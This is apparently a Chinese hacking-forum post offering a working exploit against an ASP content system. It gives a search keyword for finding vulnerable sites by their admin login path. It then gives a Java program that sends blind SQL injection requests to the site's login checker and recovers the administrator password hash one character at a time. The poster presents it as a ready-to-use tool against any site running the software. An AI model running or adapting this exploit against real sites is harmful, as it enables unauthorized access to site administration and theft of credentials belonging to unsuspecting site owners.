刚回到家里翻出来的,不知道还通不通杀额。没啥技术含量...瞧瞧就好

KeyWord:

    system/adminlogin.asp

Java写的Exp:

package kk;
import java.io.*;
import java.net.*;

public class PostResquest {
       
        private String[] key={"1","2","3","4","5","6","7","8","9","0","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","z","y"};

        public PostResquest() {
                String urlStr="http://www.xxxxx.com/system/chklogin.asp";
                String value = "managerName=asdads'or%20mid(F_PassWord,Num,1)='Str&tpassWord=123456&surl=&submit.x=0&submit.y=0";
                String tempValue;
                String tempValue2;
                OutputStreamWriter oswPost;
                BufferedReader brPost;
                try {
                        URL url=new URL(urlStr);
                        StringBuffer temp;
                        HttpURLConnection conn;
                        for(int k=1;k<=16;k++){
                                tempValue=value.replaceAll("Num",String.valueOf(k));
                                for(int i=0;i<key.length;i++){
                                        conn= (HttpURLConnection)url.openConnection();
                                        conn.setDoOutput(true);
                                        tempValue2=tempValue.replaceAll("Str", key[i]);
                                        oswPost=new OutputStreamWriter(conn.getOutputStream());
                                        oswPost.write(tempValue2);
                                        oswPost.flush();
                                        oswPost.close();
                                        brPost=new BufferedReader(new InputStreamReader(conn.getInputStream()));
                                        String line=null;
                                        temp=new StringBuffer();
                            while((line=brPost.readLine())!=null) 
                            { 
                                    line=new String(line.getBytes(),"gb2312");
                                    temp.append(line+"\r\n");
                            }
                            if(temp.indexOf("口令")>-1){
                                    System.out.print(key[i]);
                                    break;
                            }
                            if(i==key.length-1){
                                    System.out.println("出错了");
                                    return;
                            }
                           
                                }
                        }
                } catch (MalformedURLException e) {
                        e.printStackTrace();
                } catch (IOException e) {
                        e.printStackTrace();
                }
        }
        public static void main(String[] args) {
                new PostResquest();
        }
}